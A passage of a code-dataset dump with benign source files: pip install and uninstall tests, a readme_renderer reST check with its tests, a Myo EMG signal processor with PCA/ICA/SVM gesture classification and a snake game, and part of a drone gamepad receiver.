Submodules are pulled in on install and updated on upgrade.
"""
module_path, submodule_path = _create_test_package_with_submodule(script)
install_result = script.pip(
'install', '-e', 'git+' + module_path + '#egg=version_pkg'
)
assert (
script.venv / 'src/version-pkg/testpkg/static/testfile'
in install_result.files_created
)
_change_test_package_submodule(script, submodule_path)
_pull_in_submodule_changes_to_module(script, module_path)
# expect error because git may write to stderr
update_result = script.pip(
'install', '-e', 'git+' + module_path + '#egg=version_pkg',
'--upgrade',
expect_error=True,
)
assert (
script.venv / 'src/version-pkg/testpkg/static/testfile2'
in update_result.files_created
)
```
#### File: tests/unit/test_req_uninstall.py
```python
import os
import pip.req.req_uninstall
import pytest
from mock import Mock
from pip.req.req_uninstall import UninstallPathSet, uninstallation_paths
# Pretend all files are local, so UninstallPathSet accepts files in the tmpdir,
# outside the virtualenv
def mock_is_local(path):
return True
def test_uninstallation_paths():
class dist(object):
def get_metadata_lines(self, record):
return ['file.py,,',
'file.pyc,,',
'file.so,,',
'nopyc.py']
location = ''
d = dist()
paths = list(uninstallation_paths(d))
expected = ['file.py',
'file.pyc',
'file.so',
'nopyc.py',
'nopyc.pyc']
assert paths == expected
# Avoid an easy 'unique generator' bug
paths2 = list(uninstallation_paths(d))
assert paths2 == paths
class TestUninstallPathSet(object):
def test_add(self, tmpdir, monkeypatch):
monkeypatch.setattr(pip.req.req_uninstall, 'is_local', mock_is_local)
# Fix case for windows tests
file_extant = os.path.normcase(os.path.join(tmpdir, 'foo'))
file_nonexistent = os.path.normcase(
os.path.join(tmpdir, 'nonexistent'))
with open(file_extant, 'w'):
pass
ups = UninstallPathSet(dist=Mock())
assert ups.paths == set()
ups.add(file_extant)
assert ups.paths == set([file_extant])
ups.add(file_nonexistent)
assert ups.paths == set([file_extant])
@pytest.mark.skipif("sys.platform == 'win32'")
def test_add_symlink(self, tmpdir, monkeypatch):
monkeypatch.setattr(pip.req.req_uninstall, 'is_local', mock_is_local)
f = os.path.join(tmpdir, 'foo')
with open(f, 'w'):
pass
l = os.path.join(tmpdir, 'foo_link')
os.symlink(f, l)
ups = UninstallPathSet(dist=Mock())
ups.add(l)
assert ups.paths == set([l])
def test_compact_shorter_path(self, monkeypatch):
monkeypatch.setattr(pip.req.req_uninstall, 'is_local', lambda p: True)
monkeypatch.setattr('os.path.exists', lambda p: True)
# This deals with nt/posix path differences
short_path = os.path.normcase(os.path.abspath(
os.path.join(os.path.sep, 'path')))
ups = UninstallPathSet(dist=Mock())
ups.add(short_path)
ups.add(os.path.join(short_path, 'longer'))
assert ups.compact(ups.paths) == set([short_path])
@pytest.mark.skipif("sys.platform == 'win32'")
def test_detect_symlink_dirs(self, monkeypatch, tmpdir):
monkeypatch.setattr(pip.req.req_uninstall, 'is_local', lambda p: True)
# construct 2 paths:
# tmpdir/dir/file
# tmpdir/dirlink/file (where dirlink is a link to dir)
d = tmpdir.join('dir')
d.mkdir()
dlink = tmpdir.join('dirlink')
os.symlink(d, dlink)
d.join('file').touch()
path1 = str(d.join('file'))
path2 = str(dlink.join('file'))
ups = UninstallPathSet(dist=Mock())
ups.add(path1)
ups.add(path2)
assert ups.paths == set([path1])
``` |
{
"source": "jonparrott/readme_renderer",
"score": 2
} |
#### File: readme_renderer/integration/distutils.py
```python
from __future__ import absolute_import, division, print_function
import cgi
import io
import distutils.log
from distutils.command.check import check as _check
from ..rst import render
class Check(_check):
def check_restructuredtext(self):
"""
Checks if the long string fields are reST-compliant.
"""
data = self.distribution.get_long_description()
content_type = getattr(
self.distribution.metadata, 'long_description_content_type', None)
if content_type:
content_type, _ = cgi.parse_header(content_type)
if content_type != 'text/x-rst':
self.warn(
"Not checking long description content type '%s', this "
"command only checks 'text/x-rst'." % content_type)
return
# None or empty string should both trigger this branch.
if not data or data == 'UNKNOWN':
self.warn(
"The project's long_description is either missing or empty.")
return
stream = io.StringIO()
markup = render(data, stream=stream)
for line in stream.getvalue().splitlines():
if line.startswith("<string>"):
line = line[8:]
self.warn(line)
if markup is None:
self.warn(
"The project's long_description has invalid markup which will "
"not be rendered on PyPI.")
return
self.announce(
"The project's long description is valid RST.",
level=distutils.log.INFO)
```
#### File: readme_renderer/tests/test_integration_distutils.py
```python
import distutils.dist
import mock
import pytest
import setuptools.dist
import readme_renderer.integration.distutils
def test_valid_rst():
dist = distutils.dist.Distribution(attrs=dict(
long_description="Hello, I am some text."))
checker = readme_renderer.integration.distutils.Check(dist)
checker.warn = mock.Mock()
checker.check_restructuredtext()
checker.warn.assert_not_called()
def test_invalid_rst():
dist = distutils.dist.Distribution(attrs=dict(
long_description="Hello, I am some `totally borked< text."))
checker = readme_renderer.integration.distutils.Check(dist)
checker.warn = mock.Mock()
checker.announce = mock.Mock()
checker.check_restructuredtext()
# Should warn once for the syntax error, and finally to warn that the
# overall syntax is invalid
assert checker.warn.call_count == 2
message_one = checker.warn.call_args_list[0][0][0]
assert 'start-string without end-string' in message_one
message_two = checker.warn.call_args_list[1][0][0]
assert 'invalid markup' in message_two
# Should not have announced that it was valid.
checker.announce.assert_not_called()
@pytest.mark.filterwarnings('ignore:::distutils.dist')
def test_markdown():
dist = setuptools.dist.Distribution(attrs=dict(
long_description="Hello, I am some text.",
long_description_content_type="text/markdown"))
checker = readme_renderer.integration.distutils.Check(dist)
checker.warn = mock.Mock()
checker.check_restructuredtext()
checker.warn.assert_called()
assert 'content type' in checker.warn.call_args[0][0]
def test_invalid_missing():
dist = distutils.dist.Distribution(attrs=dict())
checker = readme_renderer.integration.distutils.Check(dist)
checker.warn = mock.Mock()
checker.check_restructuredtext()
checker.warn.assert_called_once_with(mock.ANY)
assert 'missing' in checker.warn.call_args[0][0]
def test_invalid_empty():
dist = distutils.dist.Distribution(attrs=dict(
long_description=""))
checker = readme_renderer.integration.distutils.Check(dist)
checker.warn = mock.Mock()
checker.check_restructuredtext()
checker.warn.assert_called_once_with(mock.ANY)
assert 'missing' in checker.warn.call_args[0][0]
``` |
{
"source": "jonpas/EMGProc",
"score": 2
} |
#### File: jonpas/EMGProc/emgproc.py
```python
import sys
import os
import argparse
import time
import serial
import csv
import math
import pickle
from collections import defaultdict
import numpy as np
from sklearn.decomposition import PCA, FastICA
from sklearn.svm import SVC
# Graph
WINDOW_WIDTH = 800
WINDOW_HEIGHT = 800
PLOT_SCROLL = 3 # higher is faster
CHANNELS = 8
FONT_SIZE = 25
# Data
FREQUENCY = 200 # Hz
CSV_HEADER_EMG = ["timestamp", "emg1", "emg2", "emg3", "emg4", "emg5", "emg6", "emg7", "emg8"]
CSV_HEADER_CA = ["timestamp", "ca1", "ca2", "ca3", "ca4", "ca5", "ca6", "ca7", "ca8"]
# Processing
RMS_WINDOW_SIZE = 50
SVM_WINDOW_SIZE = 5 # higher is smoother but more delay
SVM_IDLE_WEIGHT_FACTOR = 100.0 # higher makes "idle" move more important
VERBOSE = False
# Plotting (Pygame) window interface
class Plotter():
def __init__(self, live=False):
if "pygame" not in sys.modules:
print("Error! pygame not loaded! Plotter not available for library use.")
return None
self.screen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))
pygame.display.set_caption("Electromyography Processor")
self.font = pygame.font.Font(None, FONT_SIZE)
self.live = live
self.last_values = None
self.last_rms_values = None
self.last_ca_values = None
self.plots = 0
def plot(self, values, rms_values=[], ca_values=[], ca="", gesture="", frequency=None, recording=False):
if self.last_values is None:
self.last_values = values
self.last_rms_values = rms_values
self.last_ca_values = ca_values
self.plots = len(values) + len(ca_values)
return
self.screen.scroll(-PLOT_SCROLL)
self.screen.fill(pygame.Color("black"), (WINDOW_WIDTH - PLOT_SCROLL, 0, WINDOW_WIDTH, WINDOW_HEIGHT))
self.screen.fill(pygame.Color("black"), (0, 0, 60, WINDOW_HEIGHT))
self.clear_info()
# Subplot base
for i in range(self.plots):
base_height = self.subplot_height(i)
pygame.draw.line(self.screen, pygame.Color("darkgrey"),
(WINDOW_WIDTH - PLOT_SCROLL, base_height),
(WINDOW_WIDTH, base_height))
if i < 8 and self.plots >= 8: # Raw / RMS
plot_text = self.font.render(f"RAW {i}", True, pygame.Color("darkgrey"))
rms_offset = 10 if rms_values else 0
if rms_values:
plot_rms = self.font.render(f"RMS {i}", True, pygame.Color("blue"))
self.screen.blit(plot_rms, (0, base_height - rms_offset - FONT_SIZE // 2))
self.screen.blit(plot_text, (0, base_height + rms_offset - FONT_SIZE // 2))
else: # PCA/ICA
plot_text = self.font.render(f" {ca.upper()} {i - len(values)}", True, pygame.Color("green"))
self.screen.blit(plot_text, (0, base_height - FONT_SIZE // 2))
# Raw signal
for i, (u, v) in enumerate(zip(self.last_values, values)):
pygame.draw.line(self.screen, pygame.Color("darkslategrey"),
(WINDOW_WIDTH - PLOT_SCROLL, self.subplot_height(i, u)),
(WINDOW_WIDTH, self.subplot_height(i, v)))
# Processed signals
if rms_values:
for i, (u, v) in enumerate(zip(self.last_rms_values, rms_values)):
pygame.draw.line(self.screen, pygame.Color("blue"),
(WINDOW_WIDTH - PLOT_SCROLL, self.subplot_height(i, u)),
(WINDOW_WIDTH, self.subplot_height(i, v)))
if ca_values:
for i, (u, v) in enumerate(zip(self.last_ca_values, ca_values)):
pygame.draw.line(self.screen, pygame.Color("green"),
(WINDOW_WIDTH - PLOT_SCROLL, self.subplot_height(i + len(rms_values), u)),
(WINDOW_WIDTH, self.subplot_height(i + len(rms_values), v)))
# Information
if frequency:
self.render_frequency(frequency)
self.render_mode()
self.render_controls(recording)
if gesture:
self.render_classification(gesture)
pygame.display.flip()
self.last_values = values
self.last_rms_values = rms_values
self.last_ca_values = ca_values
def subplot_height(self, i, value=0):
scaled_value = value * 1.5
return int(WINDOW_HEIGHT / (self.plots + 1) * (i + 1 - scaled_value))
def clear_info(self):
self.screen.fill(pygame.Color("black"), (0, 0, WINDOW_WIDTH, FONT_SIZE))
self.screen.fill(pygame.Color("black"), (0, WINDOW_HEIGHT - FONT_SIZE, WINDOW_WIDTH, WINDOW_HEIGHT))
def render_mode(self):
mode_text = "LIVE" if self.live else "PLAYBACK"
mode = self.font.render(mode_text, True, pygame.Color("green"))
self.screen.blit(mode, (WINDOW_WIDTH // 2 - len(mode_text) * FONT_SIZE // 2, 0))
def render_frequency(self, frequency):
framerate = self.font.render(f"{frequency} Hz", True,
pygame.Color("green") if frequency > 180 else pygame.Color("red"))
self.screen.fill(pygame.Color("black"), (0, 0, 75, FONT_SIZE)) # Clear old framerate
self.screen.blit(framerate, (0, 0))
def render_controls(self, recording):
pause = self.font.render("P (pause)", True, pygame.Color("white"))
self.screen.blit(pause, (WINDOW_WIDTH - 250, 0))
if self.live: # Can only record live
record = self.font.render("R (stop rec)" if recording else "R (record)", True,
pygame.Color("red") if recording else pygame.Color("white"))
self.screen.blit(record, (WINDOW_WIDTH - 150, 0))
def render_classification(self, gesture):
plot_gesture = self.font.render(f"Classification: {gesture}", True, pygame.Color("green"))
self.screen.blit(plot_gesture, (WINDOW_WIDTH // 2 - 225, WINDOW_HEIGHT - FONT_SIZE))
def pause(self):
self.clear_info()
pause = self.font.render("P (resume)", True, pygame.Color("red"))
self.screen.blit(pause, (WINDOW_WIDTH - 250, 0))
self.render_mode()
pygame.display.flip()
def end(self):
self.clear_info()
pause = self.font.render("END", True, pygame.Color("red"))
self.screen.blit(pause, (WINDOW_WIDTH - 250, 0))
self.render_mode()
pygame.display.flip()
# Interface for data streaming from either live Myo device or recorded playback
class Stream():
def __init__(self, do_rms=False, pca_train_set=[], ica_train_set=[], ca_components=3, svm_train_set=[]):
self.plotter = None # Late setup (display modes)
self.reset()
# Processing
self.do_rms = do_rms
self.ca_components = ca_components
self.pca = self.init_pca(pca_train_set) if pca_train_set else None
self.ica = self.init_ica(ica_train_set) if ica_train_set else None
self.svm = self.init_svm(svm_train_set) if svm_train_set else None
self.gesture = ""
def create_plot(self, live=False):
self.plotter = Plotter(live=live)
def plot(self, data, ca=False, recording=False):
self.calc_frequency()
# Processing
rms_data, ca_data = [], []
if ca:
ca_data, data = data, []
else:
if self.do_rms or self.pca is not None or self.ica is not None:
rms_data = self.calc_rms(data)
ca_data = []
if self.pca is not None:
ca_data = self.calc_pca(rms_data)
elif self.ica is not None:
ca_data = self.calc_ica(rms_data)
if self.svm is not None:
self.gesture = self.class_svm(ca_data)
if not self.paused and self.plotter is not None:
self.plotter.plot([x / 500. for x in data],
rms_values=[x / 500. for x in rms_data],
ca_values=[x / 500. for x in ca_data],
ca=self.current_model()[1],
gesture=self.gesture,
frequency=self.frequency,
recording=recording)
return rms_data, ca_data, self.gesture
def calc_frequency(self):
self.times.append(time.time())
if len(self.times) >= 100:
self.frequency = int((len(self.times) - 1) / (self.times[-1] - self.times[0]))
self.times.clear()
def pause(self, state=False, toggle=False):
if toggle:
self.paused = not self.paused
else:
self.paused = state
if self.paused and not self.ended:
self.plotter.pause()
def end(self):
self.ended = True
if self.plotter is not None:
self.plotter.end()
def reset(self):
self.paused = False
self.ended = False
# Frequency measuring
self.times = []
self.frequency = 0
# Processing
self.rms_window = []
self.svm_window = []
# Processing
def calc_rms(self, data):
# Gather samples, up to RMS_WINDOW_SIZE
self.rms_window.append(data)
if len(self.rms_window) >= RMS_WINDOW_SIZE:
self.rms_window.pop(0)
# Calculate RMS for each channel
rms_data = [0] * CHANNELS
for channel in range(CHANNELS):
samples = [item[channel] for item in self.rms_window]
total = sum([sample ** 2 for sample in samples])
rms_data[channel] = math.sqrt(1.0 / RMS_WINDOW_SIZE * total)
if VERBOSE:
print(f"rms: {rms_data}")
return rms_data
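# Worked example (illustrative): for one channel whose window holds the alternating
# samples [30, -30, 30, -30, ...], the plain mean is ~0 while the RMS stays at ~30
# (scaled by the window fill factor), so bursts of muscle activity survive the smoothing.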
def read_ca_train_set(self, train_set, stype="?"):
emg_data = []
for file in train_set:
print(f"Training {stype.upper()} with '{file}'...")
emg_file = open(file, "r", newline="")
emg_reader = csv.reader(emg_file, csv.unix_dialect, quoting=csv.QUOTE_MINIMAL)
# Read file
header = next(emg_reader)
if header == CSV_HEADER_EMG:
try:
while True:
data = next(emg_reader)
_, emg = data[0], list(map(int, data[1:]))
emg_data.append(self.calc_rms(emg))
except StopIteration:
pass
else:
print("-> Error! Incorrect header! Expected 'RAW'.")
self.rms_window.clear()
emg_file.close()
emg_data = np.array(emg_data)
return emg_data
def read_model(self, model, stype="?"):
print(f"Reading {stype.upper()} model '{model}'...")
with open(model, "rb") as f:
return pickle.load(f)
def init_pca(self, train_set):
if isinstance(train_set, list):
emg_data = self.read_ca_train_set(train_set, "pca")
# Initialize and train
pca = PCA(n_components=self.ca_components)
pca.fit(emg_data)
else:
pca = self.read_model(train_set, "pca")
return pca
def calc_pca(self, rms_data):
emg_data = np.array(rms_data).reshape(1, -1) # Reshape to 1 sample, N features
pca_data = self.pca.transform(emg_data)[0] # Take 1 sample from array of samples (contains only one)
if VERBOSE:
print(f"pca: {pca_data}")
return pca_data
def init_ica(self, train_set):
if isinstance(train_set, list):
emg_data = self.read_ca_train_set(train_set, "ica")
# Initialize and train
ica = FastICA(n_components=self.ca_components, random_state=0)
ica.fit(emg_data)
else:
ica = self.read_model(train_set, "ica")
return ica
def calc_ica(self, rms_data):
emg_data = np.array(rms_data).reshape(1, -1) # Reshape to 1 sample, N features
ica_data = self.ica.transform(emg_data)[0] # Take 1 sample from array of samples (contains only one)
ica_data *= 5000 # Scale up
if VERBOSE:
print(f"ica: {ica_data}")
return ica_data
def read_class_train_set(self, train_set, stype="?"):
emg_data = []
classes = []
for file in train_set:
classification = os.path.basename(file).split("_")[0]
print(f"Training {stype.upper()} '{classification}' with '{file}'...")
emg_file = open(file, "r", newline="")
emg_reader = csv.reader(emg_file, csv.unix_dialect, quoting=csv.QUOTE_MINIMAL)
# Read file
header = next(emg_reader)
if header == CSV_HEADER_CA[:self.ca_components + 1]:
try:
while True:
data = next(emg_reader)
_, emg = data[0], list(map(float, data[1:]))
emg_data.append(emg)
classes.append(classification)
except StopIteration:
pass
else:
print("-> Error! Incorrect header! Expected 'PCA/ICA'.")
emg_file.close()
if "idle" not in classes:
print("Warning! No 'idle' move trained!")
emg_data, classes = np.array(emg_data), np.array(classes)
return emg_data, classes
def init_svm(self, train_set):
if isinstance(train_set, list):
emg_data, classes = self.read_class_train_set(train_set, "svm")
svm = SVC(random_state=0, kernel="rbf", class_weight={"idle": SVM_IDLE_WEIGHT_FACTOR})
svm.fit(emg_data, classes)
else:
svm = self.read_model(train_set, "svm")
return svm
def class_svm(self, ca_data):
# Gather samples, up to SVM_WINDOW_SIZE to smooth classification
self.svm_window.append(ca_data)
if len(self.svm_window) > SVM_WINDOW_SIZE:
self.svm_window.pop(0)
window = np.array(self.svm_window)
svm_classes = self.svm.predict(window) # predict each sample in window
# Take classification with most occurences in the window
d = defaultdict(int)
for svm_class in svm_classes:
d[svm_class] += 1
svm_class = max(d.items(), key=lambda x: x[1])[0]
if VERBOSE:
print(f"svm: {svm_class}")
return svm_class
return ""
def current_model(self):
if self.svm is not None:
return self.svm, "svm"
elif self.pca is not None:
return self.pca, "pca"
elif self.ica is not None:
return self.ica, "ica"
return None, ""
# Live Myo device interface
class Myo():
def __init__(self, stream, tty, native, mac):
# Instantiate
self.myo = MyoRaw(tty, native, mac)
self.stream = stream
self.recording = False
self.recording_type = self.init_recording()
# Recording
self.emg_file = None
self.emg_writer = None
# Setup
self.setup()
def close(self):
self.myo.disconnect()
self.record(False)
def setup(self):
# Add handles to process EMG and battery level data
self.myo.add_handler(DataCategory.EMG, self.handle_emg)
self.myo.add_handler(DataCategory.BATTERY, self.handle_battery)
# Subscribe to all data services in full RAW mode (200 Hz)
self.myo.subscribe(EMGMode.RAW)
# Disable sleep to avoid disconnects while retrieving data
self.myo.set_sleep_mode(1)
# Vibrate to signalise a successful setup
# myo.vibrate(1)
def run(self):
self.myo.run(1)
def disconnect(self):
self.myo.disconnect()
def sleep(self):
self.myo.deep_sleep()
def handle_emg(self, timestamp, emg, moving, characteristic_num):
emg = list(emg)
_, ca_data, _ = self.stream.plot(emg, recording=self.recording)
record_data = ca_data if len(ca_data) > 0 else emg
if self.recording:
csv_data = [timestamp]
csv_data.extend(record_data)
try:
self.emg_writer.writerow(csv_data)
except AttributeError:
print("Error! Unable to write to CSV!")
if VERBOSE:
print(f"[myo] {self.recording_type}: {timestamp}, {record_data}")
def handle_battery(self, timestamp, battery_level):
if battery_level < 5:
self.myo.set_leds([255, 0, 0], [255, 0, 0]) # red logo, red bar
else:
self.myo.set_leds([128, 128, 255], [128, 128, 255]) # purple logo, purple bar
if VERBOSE:
print(f"[myo] battery level: {timestamp}, {battery_level}")
def init_recording(self):
if self.stream.pca is not None:
return "pca"
elif self.stream.ica is not None:
return "ica"
return "raw"
def record(self, state=False, toggle=False):
if toggle:
recording = not self.recording
else:
recording = state
if recording:
filename = f"recordings/{self.recording_type}/{time.strftime('%Y%m%d-%H%M%S')}.csv"
os.makedirs(os.path.dirname(filename), exist_ok=True)
self.emg_file = open(filename, "w", newline="")
self.emg_writer = csv.writer(self.emg_file, csv.unix_dialect, quoting=csv.QUOTE_MINIMAL)
if self.recording_type == "raw":
self.emg_writer.writerow(CSV_HEADER_EMG)
else:
self.emg_writer.writerow(CSV_HEADER_CA[:self.stream.ca_components + 1])
elif self.emg_file is not None:
self.emg_file.close()
self.emg_file = None
self.emg_writer = None
self.recording = recording
# Recorded Myo data playback interface
class Playback():
def __init__(self, stream, filename):
self.stream = stream
self.valid = False
self.type = ""
try:
self.emg_file = open(filename, "r", newline="")
self.emg_reader = csv.reader(self.emg_file, csv.unix_dialect, quoting=csv.QUOTE_MINIMAL)
self.read_header()
except FileNotFoundError:
self.emg_file = None
def close(self):
if self.emg_file:
self.emg_file.close()
def read_header(self):
try:
header = next(self.emg_reader)
if header == CSV_HEADER_EMG:
self.valid = True
self.type = "raw"
if header[:2] == CSV_HEADER_CA[:2]:
self.valid = True
self.type = "ca"
except StopIteration:
pass
def is_valid(self):
return self.valid
# Plays a frame from the recording and indicating end of recording on subsequent calls
def play_frame(self):
if not self.stream.paused:
try:
data = next(self.emg_reader)
if self.type == "raw":
timestamp, emg = data[0], list(map(int, data[1:]))
rms_data, ca_data, gesture = self.stream.plot(emg)
else:
timestamp, emg = data[0], list(map(float, data[1:]))
rms_data, ca_data, gesture = self.stream.plot(emg, ca=True)
if VERBOSE:
print(f"[playback] emg: {timestamp}, {emg}")
return timestamp, rms_data, ca_data, gesture
except StopIteration:
self.stream.end()
return 0, [], [], ""
def main():
# Parse arguments
parser = argparse.ArgumentParser(description="Electromyography Processor")
group1 = parser.add_mutually_exclusive_group()
group1.add_argument("-r", "--recording", default=None, metavar="REC", help="playback recorded Myo data stream")
group1.add_argument("-s", "--sleep", default=False, action="store_true", help="put Myo into deep sleep (turn off)")
parser.add_argument("--rms", default=False, action="store_true", help="process stream using RMS smoothing")
group2 = parser.add_mutually_exclusive_group()
group2.add_argument("--pca", nargs="+", metavar="REC", help="process stream using RAW training set or PCA model")
group2.add_argument("--ica", nargs="+", metavar="REC", help="process stream using RAW training set or ICA model")
parser.add_argument("-c", "--components", default=3, type=int, help="PCA/ICA components to use")
group3 = parser.add_mutually_exclusive_group()
group3.add_argument("--svm", nargs="+", metavar="REC", help="classify using PCA/ICA training set or SVM model")
group4 = parser.add_mutually_exclusive_group()
group4.add_argument("--tty", default=None, help="Myo dongle device (autodetected if omitted)")
group4.add_argument("--native", default=False, action="store_true", help="use a native Bluetooth stack")
parser.add_argument("--mac", default=None, help="Myo MAC address (arbitrarily detected if omitted)")
parser.add_argument("-v", "--verbose", default=False, action="store_true", help="verbose output")
args = parser.parse_args()
if args.svm and not args.pca and not args.ica:
parser.error("the following arguments are required for 'svm': 'pca' or 'ica'")
# Model was given instead of trainining set
if args.pca is not None and len(args.pca) == 1 and not args.pca[0].endswith(".csv"):
args.pca = args.pca[0]
if args.ica is not None and len(args.ica) == 1 and not args.ica[0].endswith(".csv"):
args.ica = args.ica[0]
if args.svm is not None and len(args.svm) == 1 and not args.svm[0].endswith(".csv"):
args.svm = args.svm[0]
if args.verbose:
global VERBOSE
VERBOSE = args.verbose
live_myo = args.recording is None
# Setup common stream interface for Myo or Playback
stream = Stream(do_rms=args.rms, pca_train_set=args.pca, ica_train_set=args.ica, svm_train_set=args.svm,
ca_components=args.components)
# Setup Myo or Playback
if live_myo:
try:
print("Connecting to Myo...")
myo = Myo(stream, args.tty, args.native, args.mac)
print("Connected to Myo!")
except (ValueError, KeyboardInterrupt) as e:
print(f"Error! Unable to connect!\n{e}")
return 1
else:
playback = Playback(stream, args.recording)
if not playback.is_valid():
print("Error! Invalid CSV file!")
return 2
# Run main logic
if args.sleep:
if live_myo:
myo.sleep()
else:
pygame.init()
stream.create_plot(live=live_myo)
# Run until terminated by user or recording ended
try:
starttime = time.time()
while True:
if live_myo:
try:
myo.run()
except serial.serialutil.SerialException:
print("Error! Myo exception! Attempting reboot...")
myo.disconnect()
myo = Myo(stream, args.tty, args.native, args.mac)
else:
playback.play_frame()
# Delay by (1 second / FREQUENCY Hz) including execution time
delay = 1 / FREQUENCY
diff = min(time.time() - starttime, 1 / FREQUENCY)
time.sleep(delay - diff)
starttime = time.time()
# Handle Pygame events
for ev in pygame.event.get():
if ev.type == pygame.QUIT:
raise KeyboardInterrupt()
elif ev.type == pygame.KEYDOWN:
if ev.key == pygame.K_q:
raise KeyboardInterrupt()
elif ev.key == pygame.K_p:
stream.pause(toggle=True)
elif ev.key == pygame.K_r:
if live_myo:
myo.record(toggle=True)
except KeyboardInterrupt:
pass
if live_myo:
myo.close()
else:
playback.close()
return 0
# Conditional imports
if __name__ == "__main__" or os.environ.get("EMGPROC_LOAD_GAME", False):
import pygame
if __name__ == "__main__" or os.environ.get("EMGPROC_LOAD_MYO", False):
from myo_raw import MyoRaw, DataCategory, EMGMode
if __name__ == "__main__":
sys.exit(main())
```
#### File: EMGProc/game/game.py
```python
import random
import pygame
from .models.snake import Snake
from .models.cube import Cube
from .models.menu import MenuGame
pygame.init()
class MainGame:
def __init__(self, stream=None):
self.width = 500
self.height = 500
self.rows = 20
self.window = pygame.display.set_mode((self.width, self.height))
self.caption = "SnaPy Myo"
self.color = (255, 0, 0)
self.menu_font = pygame.font.Font("game/fonts/menu_font.ttf", 24)
self.name_font = pygame.font.Font("game/fonts/name_font.ttf", 30)
self.cre_by = pygame.font.Font("game/fonts/menu_font.ttf", 14)
self.score_font = pygame.font.Font("game/fonts/menu_font.ttf", 12)
print("Created by Wultes - https://github.com/wultes/")
print("Modified by Jonpas for Myo armband input")
self.stream = stream
self.menu()
def setup(self):
self.player = Snake(self.color, (10, 10))
self.snack = Cube(self.random_snack(), color=(0, 255, 0))
self.score = 0
self.paused = False
self.last_gesture = "idle"
def draw_score(self):
textobj = self.score_font.render(f"Score: {self.score}", 1, (0, 0, 0))
textreact = textobj.get_rect()
textreact.topleft = (10, 10)
self.window.blit(textobj, textreact)
def draw_myo_frequency(self):
freq = self.stream.frequency
textobj = self.score_font.render(f"{freq} Hz", 1,
pygame.Color("darkgreen") if freq > 180 else pygame.Color("red"))
textreact = textobj.get_rect()
textreact.topright = (self.width - 10, 10)
self.window.blit(textobj, textreact)
def draw_myo_gesture(self):
gesture = self.last_gesture
textobj = self.score_font.render(f"{gesture}", 1,
pygame.Color("darkgreen") if gesture != "idle" else pygame.Color("grey"))
textreact = textobj.get_rect()
textreact.topright = (self.width - 10, 30)
self.window.blit(textobj, textreact)
def draw(self):
self.window.fill((255, 255, 255))
self.player.draw(self.window)
self.snack.draw(self.window)
self.draw_score()
self.draw_myo_frequency()
self.draw_myo_gesture()
pygame.display.update()
def random_snack(self):
positions = self.player.body
while True:
x = random.randrange(self.rows)
y = random.randrange(self.rows)
if len(list(filter(lambda z: z.pos == (x, y), positions))) <= 0:
break
return (x, y)
def menu(self):
try:
pygame.display.set_caption(self.caption)
menu = MenuGame()
while True:
# Delay required so we don't take all CPU time away from the Myo thread
pygame.time.delay(100)
for event in pygame.event.get():
if event.type == pygame.QUIT:
raise KeyboardInterrupt()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_q:
raise KeyboardInterrupt()
elif event.key == pygame.K_SPACE:
self.setup()
self.run()
menu.draw(self.window)
except KeyboardInterrupt:
pass
return 0
def run(self):
try:
pygame.display.set_caption(self.caption)
clock = pygame.time.Clock()
while True:
pygame.time.delay(50)
clock.tick(5)
# Keyboard input
move = None
for ev in pygame.event.get():
if ev.type == pygame.QUIT:
raise KeyboardInterrupt()
elif ev.type == pygame.KEYDOWN:
if ev.key == pygame.K_q:
raise KeyboardInterrupt()
elif ev.key == pygame.K_p:
self.paused = not self.paused
elif not self.paused:
if ev.key == pygame.K_LEFT or ev.key == pygame.K_a:
move = "left"
elif ev.key == pygame.K_RIGHT or ev.key == pygame.K_d:
move = "right"
if self.paused:
continue
# Gesture input
gesture = self.stream.gesture
if gesture != self.last_gesture:
self.last_gesture = gesture
if gesture == "extension":
move = "right"
elif gesture == "flexion":
move = "left"
self.player.move(move)
if self.player.body[0].pos == self.snack.pos:
self.score += 1
self.player.add_cube()
self.snack = Cube(self.random_snack(), color=(0, 255, 0))
for x in range(len(self.player.body)):
if self.player.body[x].pos in list(map(lambda z: z.pos, self.player.body[x + 1:])):
print(f"Your score: {len(self.player.body)}")
self.score = 0
self.player.reset((10, 10))
break
self.draw()
except KeyboardInterrupt:
pass
```
#### File: game/models/cube.py
```python
import pygame
class Cube:
def __init__(self, start, dirnx=1, dirny=0, color=(255, 0, 0)):
self.pos = start
self.dirnx = dirnx
self.dirny = dirny
self.color = color
self.width = 500
self.rows = 20
def move(self, dirnx, dirny):
self.dirnx = dirnx
self.dirny = dirny
self.pos = (self.pos[0] + self.dirnx, self.pos[1] + self.dirny)
def draw(self, window, eyes=False):
dis = self.width // self.rows
i = self.pos[0]
j = self.pos[1]
pygame.draw.rect(window, self.color, (i * dis + 1, j * dis + 1, dis - 2, dis - 2))
if eyes:
centre = dis // 2
radius = 3
circleMiddle = (i * dis + centre - radius, j * dis + 8)
circleMiddle2 = (i * dis + dis - radius * 2, j * dis + 8)
pygame.draw.circle(window, (0, 0, 0), circleMiddle, radius)
pygame.draw.circle(window, (0, 0, 0), circleMiddle2, radius)
``` |
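A minimal sketch of the grid logic above, assuming the file layout makes the module importable as `game.models.cube`; no Pygame window is needed to exercise `move()`:
```python
# Illustrative only - import path follows the file layout above (assumption).
from game.models.cube import Cube

c = Cube((10, 10))
c.move(1, 0)    # step one grid cell to the right
print(c.pos)    # expected: (11, 10)
```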
{
"source": "jonpas/FERI-DroneTasks",
"score": 3
} |
#### File: FERI-DroneTasks/SIS_Player/Receiver.py
```python
from inputs import get_gamepad
from threading import Thread, Event
from time import sleep
from PpmSignal import PpmSignal
class Receiver:
def __init__(self, parent):
self.recording_signal = Event()
self.send_delay = 0.0225
self.parent = parent
self.signal = PpmSignal()
# TEST
# for i in range(10):
# self.signal.axis_to_signal(1, 2, 1.5, 1, 2, 1, 1.5, 1.5)
self.create_threads()
# Axis values
self.roll = 1.5
self.pitch = 1.5
self.yaw = 1.5
self.throttle = 1.5
# Starts recording inputs async
def get_inputs(self):
self.recording_signal.set()
self.create_threads()
self.recording_Thread.start()
self.sending_Thread.start()
# Function that will run async and will record controller state
def recording_function(self):
while self.recording_signal.is_set():
events = get_gamepad()
for event in events:
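# Scale raw axis values (-32768..32767) to roughly 1.0-2.0, i.e. a servo-style PPM pulse width in milliseconds (assumed mapping)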
if event.code == "ABS_X":
self.roll = (event.state / (32767 * 2)) + 1.5
elif event.code == "ABS_Y":
self.pitch = (event.state / (32767 * 2)) + 1.5
elif event.code == "ABS_RX":
self.yaw = (event.state / (32767 * 2)) + 1.5
elif event.code == "ABS_RY":
self.throttle = (event.state / (32767 * 2)) + 1.5
